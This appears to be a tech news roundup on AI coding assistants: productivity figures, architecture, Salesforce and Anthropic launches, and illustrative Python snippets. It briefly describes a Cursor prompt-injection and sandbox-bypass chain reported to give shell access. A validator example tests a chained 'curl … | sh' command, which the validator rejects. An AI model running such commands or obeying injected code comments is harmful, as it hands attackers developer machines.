AI Coding Tools Show Promise Despite Productivity Concerns

Developer productivity analytics firm Waydev reports that AI coding assistants such as GitHub Copilot, Cursor, and Claude Code see initial acceptance rates of 80-90%, but that real-world effectiveness drops to 10-30% once subsequent code revisions are taken into account. According to TechCrunch, the “tokenmaxxing” trend among Silicon Valley developers, in which large AI token budgets become status symbols, may be obscuring how much productivity these tools actually deliver.

The findings challenge the widespread assumption that AI-generated code automatically translates to increased developer efficiency. Alex Circei, CEO of Waydev, which tracks analytics for over 10,000 software engineers across 50 companies, reports that while engineers initially accept most AI-generated code, they frequently return to revise it within weeks, undermining claimed productivity improvements.
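The difference between the two figures comes down to what is counted and when. The sketch below is a minimal illustration, not Waydev's method: the `Suggestion` record, its fields, and the sample numbers are all hypothetical and chosen only to show how an acceptance rate measured at suggestion time can diverge from a rate measured after a revision window.

```python
from dataclasses import dataclass


@dataclass
class Suggestion:
    """One AI suggestion shown to a developer (hypothetical record shape)."""
    lines_suggested: int  # lines the assistant proposed
    lines_accepted: int   # lines the developer accepted when they were offered
    lines_surviving: int  # accepted lines still unchanged after the revision window


def acceptance_rate(suggestions: list[Suggestion]) -> float:
    """Share of suggested lines accepted at suggestion time."""
    suggested = sum(s.lines_suggested for s in suggestions)
    accepted = sum(s.lines_accepted for s in suggestions)
    return accepted / suggested if suggested else 0.0


def retained_rate(suggestions: list[Suggestion]) -> float:
    """Share of suggested lines that are still in place after later revisions."""
    suggested = sum(s.lines_suggested for s in suggestions)
    surviving = sum(s.lines_surviving for s in suggestions)
    return surviving / suggested if suggested else 0.0


# Illustrative numbers only; they are not taken from any real dataset.
sample = [
    Suggestion(lines_suggested=100, lines_accepted=90, lines_surviving=25),
    Suggestion(lines_suggested=50, lines_accepted=40, lines_surviving=10),
    Suggestion(lines_suggested=50, lines_accepted=45, lines_surviving=15),
]

print(f"initial acceptance: {acceptance_rate(sample):.1%}")
print(f"retained after revisions: {retained_rate(sample):.1%}")
```

With these made-up inputs the first figure is 87.5% and the second is 25.0%, which is the shape of the gap the article describes.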



Technical Architecture Behind Modern AI Coding Assistants

AI coding tools use large language models trained on large code repositories to suggest code in context and complete functions. GitHub Copilot was originally built on OpenAI’s Codex model, while Cursor implements custom fine-tuned models optimized for integrated development environments (IDEs).

These systems employ several key technical methodologies:

- Contextual embedding: Models analyze surrounding code, comments, and file structure to generate relevant suggestions

- Mixed input processing: Natural language prompts are combined with existing code syntax in a single request

- Real-time inference: Low-latency response generation within milliseconds for seamless developer workflow

- Continuous learning: Models adapt to coding patterns and preferences through user interaction data
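The context-gathering step in the list above can be sketched in a few lines. This is a simplified illustration under stated assumptions, not how any named product works: `build_context`, the character budget, and the three-quarters split in favor of code before the cursor are all hypothetical choices.

```python
def build_context(source: str, cursor: int, budget: int = 2000) -> dict[str, str]:
    """Split a file at the cursor and keep the text nearest to it.

    The budget is counted in characters for simplicity; a real tool would
    more likely count model tokens.
    """
    if not 0 <= cursor <= len(source):
        raise ValueError("cursor is outside the file")
    # Spend about three quarters of the budget on code before the cursor.
    prefix_budget = budget * 3 // 4
    suffix_budget = budget - prefix_budget
    prefix = source[max(0, cursor - prefix_budget):cursor]
    suffix = source[cursor:cursor + suffix_budget]
    return {"prefix": prefix, "suffix": suffix}


code = "def area(radius):\n    return \n\nprint(area(2))\n"
cursor = code.index("return ") + len("return ")
ctx = build_context(code, cursor, budget=40)
print(repr(ctx["prefix"]))
print(repr(ctx["suffix"]))
```

The prefix and suffix would then be sent to the model, which is asked to fill in the text at the cursor.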

The transformer architecture underlying these models uses attention mechanisms to relate tokens across the context window, which helps the models track code dependencies and keep suggestions consistent with the surrounding code. However, the gap between initial acceptance and long-term code quality suggests limitations in the models’ understanding of broader software architecture principles.

Security Vulnerabilities in AI Development Tools

Recent security research exposed critical vulnerabilities in popular AI coding platforms. According to SecurityWeek, Cursor AI contained an indirect prompt injection vulnerability that could be chained with sandbox bypass techniques to gain shell access to developer machines through the platform’s remote tunnel feature.

This vulnerability highlights fundamental security challenges in AI-assisted development:

- Prompt injection attacks: Malicious code comments could manipulate AI responses to execute unintended commands

- Sandbox escape: AI models may inadvertently suggest code that bypasses security restrictions

- Remote access exploitation: Cloud-based AI tools create new attack vectors for accessing developer environments

The incident underscores the need for robust security frameworks specifically designed for AI coding assistants, including input validation, output sanitization, and isolated execution environments.
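One form of input validation is to check any shell command an assistant proposes before it runs. The sketch below assumes a hypothetical allowlist policy; `ALLOWED_COMMANDS` and `is_command_allowed` are illustrative names, and this is not a description of how Cursor or any other product handles commands. It is one layer only and does not replace an isolated execution environment.

```python
import shlex

# Hypothetical policy: programs the assistant may run without human approval.
ALLOWED_COMMANDS = {"ls", "cat", "git", "pytest"}

# Characters that let one shell string chain, redirect, or substitute commands.
SHELL_METACHARACTERS = set(";&|`$><\n")


def is_command_allowed(command: str) -> bool:
    """Return True only for a single allowlisted program with no shell operators."""
    if any(ch in SHELL_METACHARACTERS for ch in command):
        return False
    try:
        tokens = shlex.split(command)
    except ValueError:
        # shlex raises ValueError on unbalanced quotes; treat that as unsafe.
        return False
    return bool(tokens) and tokens[0] in ALLOWED_COMMANDS


for candidate in ["git status", "git status; curl http://example.com | sh", "curl http://example.com"]:
    print(candidate, "->", is_command_allowed(candidate))
```

Only the first candidate passes. An allowlisted program can still be misused through its own arguments, so a check like this narrows the attack surface rather than closing it.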

Enterprise Platform Integration and API Exposure

Salesforce’s recent “Headless 360” initiative demonstrates how enterprise platforms are adapting to AI-first development paradigms. According to VentureBeat, the company exposed its entire platform through APIs, Model Context Protocol (MCP) tools, and CLI commands, enabling AI agents to operate without traditional graphical interfaces.

This architectural transformation reflects broader industry trends:

- API-first design: Traditional software interfaces being replaced by programmable endpoints

- Agent-oriented architecture: Systems designed for AI consumption rather than human interaction

- Microservices decomposition: Monolithic applications broken into discrete, AI-accessible components

Jayesh Govindarajan, Salesforce EVP, emphasized that this represents a fundamental shift from UI-centric to programmatic access patterns, positioning enterprise software for an AI-native future.
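To make the agent-oriented idea concrete, the sketch below shows a tiny in-process tool registry: each capability is published with a machine-readable description so an agent can discover and call it without a graphical interface. Everything here is hypothetical, including `Tool`, `register`, `describe_tools`, `call_tool`, and the sample account data. It does not use the MCP SDK or any Salesforce API and is not a description of Headless 360.

```python
import json
from dataclasses import dataclass
from typing import Any, Callable


@dataclass
class Tool:
    """A capability exposed to agents (hypothetical shape)."""
    name: str
    description: str
    parameters: dict[str, str]  # parameter name -> type label
    handler: Callable[..., Any]


REGISTRY: dict[str, Tool] = {}


def register(tool: Tool) -> None:
    """Make a tool discoverable under its name."""
    REGISTRY[tool.name] = tool


def describe_tools() -> str:
    """Return a JSON catalogue an agent could read to discover capabilities."""
    catalogue = [
        {"name": t.name, "description": t.description, "parameters": t.parameters}
        for t in REGISTRY.values()
    ]
    return json.dumps(catalogue, indent=2)


def call_tool(name: str, arguments: dict[str, Any]) -> Any:
    """Dispatch an agent's request after checking the tool and argument names."""
    tool = REGISTRY.get(name)
    if tool is None:
        raise KeyError(f"unknown tool: {name}")
    unexpected = set(arguments) - set(tool.parameters)
    if unexpected:
        raise ValueError(f"unexpected arguments: {sorted(unexpected)}")
    return tool.handler(**arguments)


# Hypothetical in-memory data standing in for a real backend.
ACCOUNTS = {"acme": {"owner": "dana", "open_cases": 3}}

register(Tool(
    name="get_account",
    description="Look up an account by its identifier.",
    parameters={"account_id": "string"},
    handler=lambda account_id: ACCOUNTS.get(account_id),
))

print(describe_tools())
print(call_tool("get_account", {"account_id": "acme"}))
```

The design point is that the catalogue, not a screen, is the interface: the agent reads the descriptions and then issues structured calls.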

Performance Metrics and Productivity Measurement

The challenge of measuring AI coding tool effectiveness extends beyond simple acceptance rates. Traditional metrics like lines of code per hour become meaningless when AI can generate thousands of lines instantly. More sophisticated measurement approaches include:

Code Quality Metrics:

- Cyclomatic complexity reduction

- Bug density in AI-generated versus human-written code

- Test coverage and maintainability scores

Developer Experience Indicators:

- Time to first working prototype

- Cognitive load reduction through automated boilerplate generation

- Learning curve acceleration for new technologies

Business Impact Assessment:

- Feature delivery velocity

- Technical debt accumulation rates

- Long-term maintenance overhead

Waydev’s analytics platform has been completely reworked to capture these nuanced productivity indicators, moving beyond surface-level metrics to understand genuine development efficiency gains.
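As an example of one code quality metric from the list above, cyclomatic complexity can be approximated for Python source with the standard `ast` module. This is a rough sketch that counts common decision points; it is not Waydev's implementation, and dedicated tools apply more detailed rules.

```python
import ast

# Node types that each add one decision point in this simplified count.
BRANCH_NODES = (
    ast.If,
    ast.For,
    ast.While,
    ast.ExceptHandler,
    ast.IfExp,
    ast.comprehension,
)


def cyclomatic_complexity(source: str) -> int:
    """Approximate cyclomatic complexity as 1 plus the number of decision points."""
    tree = ast.parse(source)
    complexity = 1
    for node in ast.walk(tree):
        if isinstance(node, BRANCH_NODES):
            complexity += 1
        elif isinstance(node, ast.BoolOp):
            # "a or b or c" adds two extra paths: one per additional operand.
            complexity += len(node.values) - 1
    return complexity


snippet = '''
def classify(n):
    if n < 0 or n > 100:
        return "out of range"
    for d in (2, 3):
        if n % d == 0:
            return "divisible"
    return "other"
'''

print(cyclomatic_complexity(snippet))  # prints 5
```

Running the same function over a file before and after an AI-assisted change gives a simple way to check whether the change made the code harder to follow.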

Expanding AI Tool Capabilities Beyond Code Generation

Anthropic’s launch of Claude Design shows AI tools expanding beyond pure code generation into visual prototyping and design workflows. According to VentureBeat, the tool, powered by Claude Opus 4.7, enables developers to create interactive prototypes, slide decks, and marketing materials through conversational prompts.

This expansion challenges traditional development tool categories:

- Cross-functional integration: AI tools bridging design, development, and content creation workflows

- Prompt-to-prototype pipelines: Direct translation from natural language requirements to working applications

- Visual-code synthesis: Automatic generation of both interface designs and underlying implementation

The simultaneous release of enhanced vision models alongside design tools demonstrates the technical convergence enabling more sophisticated AI-assisted development workflows.

What This Means

The current state of AI coding tools reveals a technology in transition. While these systems demonstrate impressive capabilities in code generation and developer assistance, the gap between initial promise and sustained productivity gains highlights the need for more sophisticated evaluation frameworks.

Developers and engineering managers must move beyond “tokenmaxxing” metrics to focus on long-term code quality, maintainability, and genuine productivity improvements. The security vulnerabilities discovered in platforms like Cursor emphasize that AI coding tools require specialized security considerations beyond traditional software development practices.

As enterprise platforms like Salesforce rebuild their architectures for AI-first interactions, and tools like Claude Design expand AI capabilities into visual design workflows, the developer ecosystem is evolving toward more integrated, AI-native development environments. Success in this transition will depend on balancing AI automation with human oversight, robust security practices, and meaningful productivity measurement.

FAQ

Q: How accurate are AI coding tools like Copilot and Cursor?

A: Initial acceptance rates reach 80-90%, but long-term effectiveness drops to 10-30% after accounting for necessary code revisions and maintenance overhead.

Q: What security risks do AI coding assistants introduce?

A: Key risks include prompt injection attacks, sandbox escape vulnerabilities, and remote access exploitation through cloud-based AI development platforms.

Q: How should developers measure productivity gains from AI coding tools?

A: Focus on code quality metrics, long-term maintainability, feature delivery velocity, and technical debt accumulation rather than simple lines of code or token consumption.
